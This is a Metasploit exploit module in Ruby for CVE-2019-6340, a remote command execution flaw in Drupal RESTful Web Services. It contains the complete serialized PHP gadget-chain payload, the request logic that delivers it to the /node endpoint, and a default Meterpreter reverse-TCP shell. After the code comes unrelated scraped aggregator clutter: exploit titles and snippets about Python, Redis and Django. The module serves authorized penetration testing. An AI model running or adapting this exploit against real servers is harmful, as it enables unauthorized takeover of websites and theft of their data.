##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  # NOTE: All (four) Web Services modules need to be enabled

  Rank = NormalRanking

  include Msf::Exploit::Remote::HTTP::Drupal

  def initialize(info = {})

    super(update_info(info,

      'Name'               => 'Drupal RESTful Web Services unserialize() RCE',

      'Description'        => %q{

        This module exploits a PHP unserialize() vulnerability in Drupal RESTful

        Web Services by sending a crafted request to the /node REST endpoint.

        As per SA-CORE-2019-003, the initial remediation was to disable POST,

        PATCH, and PUT, but Ambionics discovered that GET was also vulnerable

        (albeit cached). Cached nodes can be exploited only once.

        Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of

        this alternate vector.

        Drupal < 8.5.11 and < 8.6.10 are vulnerable.

      },

      'Author'             => [

        'Jasper Mattsson', # Discovery

        'Charles Fol',     # PoC

        'Rotem Reiss',     # Module

        'wvu'              # Module

      ],

      'References'         => [

        ['CVE', '2019-6340'],

        ['URL', 'https://www.drupal.org/sa-core-2019-003'],

        ['URL', 'https://www.drupal.org/psa-2019-02-22'],

        ['URL', 'https://www.ambionics.io/blog/drupal8-rce'],

        ['URL', 'https://github.com/ambionics/phpggc'],

        ['URL', 'https://twitter.com/jcran/status/1099206271901798400']

      ],

      'DisclosureDate'     => '2019-02-20',

      'License'            => MSF_LICENSE,

      'Platform'           => ['php', 'unix'],

      'Arch'               => [ARCH_PHP, ARCH_CMD],

      'Privileged'         => false,

      'Targets'            => [

        ['PHP In-Memory',

          'Platform'       => 'php',

          'Arch'           => ARCH_PHP,

          'Type'           => :php_memory,

          'Payload'        => {'BadChars' => "'"},

          'DefaultOptions' => {

            'PAYLOAD'      => 'php/meterpreter/reverse_tcp'

          }

        ],

        ['Unix In-Memory',

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Type'           => :unix_memory,

          'DefaultOptions' => {

            'PAYLOAD'      => 'cmd/unix/generic',

            'CMD'          => 'id'

          }

        ]

      ],

      'DefaultTarget'      => 0,

      'Notes'              => {

        'Stability'        => [CRASH_SAFE],

        'SideEffects'      => [IOC_IN_LOGS],

        'Reliablity'       => [UNRELIABLE_SESSION], # When using the GET method

        'AKA'              => ['SA-CORE-2019-003']

      }

    ))

    register_options([

      OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST',

                            ['GET', 'POST', 'PATCH', 'PUT']]),

      OptInt.new('NODE',    [false, 'Node ID to target with GET method', 1])

    ])

    register_advanced_options([

      OptBool.new('ForceExploit', [false, 'Override check result', false])

    ])

  end

  def check

    checkcode = CheckCode::Unknown

    version = drupal_version

    unless version

      vprint_error('Could not determine Drupal version')

      return checkcode

    end

    if version.to_s !~ /^8\b/

      vprint_error("Drupal #{version} is not supported")

      return CheckCode::Safe

    end

    vprint_status("Drupal #{version} targeted at #{full_uri}")

    checkcode = CheckCode::Detected

    changelog = drupal_changelog(version)

    unless changelog

      vprint_error('Could not determine Drupal patch level')

      return checkcode

    end

    case drupal_patch(changelog, 'SA-CORE-2019-003')

    when nil

      vprint_warning('CHANGELOG.txt no longer contains patch level')

    when true

      vprint_warning('Drupal appears patched in CHANGELOG.txt')

      checkcode = CheckCode::Safe

    when false

      vprint_good('Drupal appears unpatched in CHANGELOG.txt')

      checkcode = CheckCode::Appears

    end

    # Any further with GET and we risk caching the targeted node

    return checkcode if meth == 'GET'

    # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable

    token = Rex::Text.rand_text_alphanumeric(8..42)

    res   = execute_command("echo #{token}")

    return checkcode unless res

    if res.body.include?(token)

      vprint_good('Drupal is vulnerable to code execution')

      checkcode = CheckCode::Vulnerable

    end

    checkcode

  end

  def exploit

    if [CheckCode::Safe, CheckCode::Unknown].include?(check)

      if datastore['ForceExploit']

        print_warning('ForceExploit set! Exploiting anyway!')

      else

        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')

      end

    end

    if datastore['PAYLOAD'] == 'cmd/unix/generic'

      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')

      # XXX: Naughty datastore modification

      datastore['DUMP_OUTPUT'] = true

    end

    case target['Type']

    when :php_memory

      # XXX: This will spawn a *very* obvious process

      execute_command("php -r '#{payload.encoded}'")

    when :unix_memory

      execute_command(payload.encoded)

    end

  end

  def execute_command(cmd, opts = {})

    vprint_status("Executing with system(): #{cmd}")

    # https://en.wikipedia.org/wiki/Hypertext_Application_Language

    hal_json = JSON.pretty_generate(

      'link'      => [

        'value'   => 'link',

        'options' => phpggc_payload(cmd)

      ],

      '_links'    => {

        'type'    => {

          'href'  => vhost_uri

        }

      }

    )

    print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}")

    res = send_request_cgi({

      'method'   => meth,

      'uri'      => node_uri,

      'ctype'    => 'application/hal+json',

      'vars_get' => {'_format' => 'hal_json'},

      'data'     => hal_json

    }, 3.5)

    return unless res

    case res.code

    # 401 isn't actually a failure when using the POST method

    when 200, 401

      print_line(res.body) if datastore['DUMP_OUTPUT']

      if meth == 'GET'

        print_warning('If you did not get code execution, try a new node ID')

      end

    when 404

      print_error("#{node_uri} not found")

    when 405

      print_error("#{meth} method not allowed")

    when 422

      print_error('VHOST may need to be set')

    when 406

      print_error('Web Services may not be enabled')

    else

      print_error("Unexpected reply: #{res.inspect}")

    end

    res

  end

  # phpggc Guzzle/RCE1 system id

  def phpggc_payload(cmd)

    (

      # http://www.phpinternalsbook.com/classes_objects/serialization.html

      <<~EOF

        O:24:"GuzzleHttp\\Psr7\\FnStream":2:{

          s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{

            s:5:"close";a:2:{

              i:0;O:23:"GuzzleHttp\\HandlerStack":3:{

                s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";

                  s:cmd_len:"cmd";

                s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack";

                  a:1:{i:0;a:1:{i:0;s:6:"system";}}

                s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached";

                  b:0;

              }

              i:1;s:7:"resolve";

            }

          }

          s:9:"_fn_close";a:2:{

            i:0;r:4;

            i:1;s:7:"resolve";

          }

        }

      EOF

    ).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd)

  end

  def meth

    datastore['METHOD'] || 'POST'

  end

  def node

    datastore['NODE'] || 1

  end

  def node_uri

    if meth == 'GET'

      normalize_uri(target_uri.path, '/node', node)

    else

      normalize_uri(target_uri.path, '/node')

    end

  end

  def vhost_uri

    full_uri(

      normalize_uri(target_uri.path, '/rest/type/shortcut/default'),

      vhost_uri: true

    )

  end

end

[EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. WebStorm 11、PhpStorm 10免费激活(不需要注册码)

    之前分享的WebStorm9.WebStrom10.PhpStorm9注册码生成网站已经被站长关了,比较遗憾!http://my.oschina.net/ximidao/blog/486353 现在官 ...

  4. 下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y),y++);

    下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y) ...

  5. ssh The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established

    The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established. ECDSA key fingerprint is SH ...

  6. jenkins git can't work ERROR: Timeout after 10 minutes ERROR: Error fetching remote repo 'origin'

    Started by user Allen Running as Allen Building remotely on MISTestSrv2 (MIS) in workspace C:\jenkin ...

  7. 10 Future Web Trends 十大未来互联网趋势

    转载自:http://blog.sina.com.cn/s/blog_4be577310100ajpb.html 我们很满意自己进入的当前网络纪元,通常被称为Web 2.0.这个阶段互联网的特征包括搜 ...

  8. CXF(2.7.10) - RESTful Services, JSON Support

    在 CXF(2.7.10) - RESTful Services 介绍了 REST 风格的 WebService 服务,数据传输是基于 XML 格式的.如果要基于 JSON 格式传输数据,仅需要将注解 ...

  9. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

随机推荐

  1. 最小的K个数(python)

    题目描述 输入n个整数,找出其中最小的K个数.例如输入4,5,1,6,2,7,3,8这8个数字,则最小的4个数字是1,2,3,4,.   # -*- coding:utf-8 -*- class So ...

  2. echo不换行的实现

    1. echo的参数中, -e表示开启转义, /c表示不换行: echo -e "please input a value:/c" 2. -n不换行: echo -n " ...

  3. 考研结束,重返python

    因为考研的原因,python的学习告一段落,现在考验终于结束了,也抓眼又到了新的一年.新的一年里也要继续加油啊.python学习之路还要继续下去,但是毕竟有将近半年没有鹏编程了,首先我还是需要好好的复 ...

  4. SSM框架整合的其它方式

    ---------------------siwuxie095                                 SSM 框架整合的其它方式         1.主要是整合 Spring ...

  5. 大数据OLAP引擎对比

    Presto:内存计算,mpp架构   PB级别数据 presto适合pb级的海量数据查询分析,不是说把pb的数据放进内存,比如一张pb表,查询count,vag这种有个特点,虽然数据很多,但是最终的 ...

  6. 451. Sort Characters By Frequency将单词中的字母按照从高频到低频的顺序输出

    [抄题]: Given a string, sort it in decreasing order based on the frequency of characters. Example 1: I ...

  7. thu-learn-lib 开发小记(转)

    原创:https://harrychen.xyz/2019/02/09/thu-learn-lib/ 今天是大年初五,原本计划出门玩,但是天气比较糟糕就放弃了.想到第一篇博客里面预告了要给thu-le ...

  8. java编译时出现——注:使用了未经检查或不安全的操作。注:有关详细信息,请使用 -Xlint:unchecked 重新编译

    网上说是泛型问题 private List<Product> products = new ArrayList<Product>(); 这种用法绝对没错!(因为是照着书写的)在 ...

  9. redis集群密码设置

    1.密码设置(推荐)方式一:修改所有Redis集群中的redis.conf文件加入: masterauth passwd123 requirepass passwd123 说明:这种方式需要重新启动各 ...

  10. related_name和related_query_name举例区别

    例1: class UserInfo(models.Model): nickname = models.CharField(max_length=32) username = models.CharF ...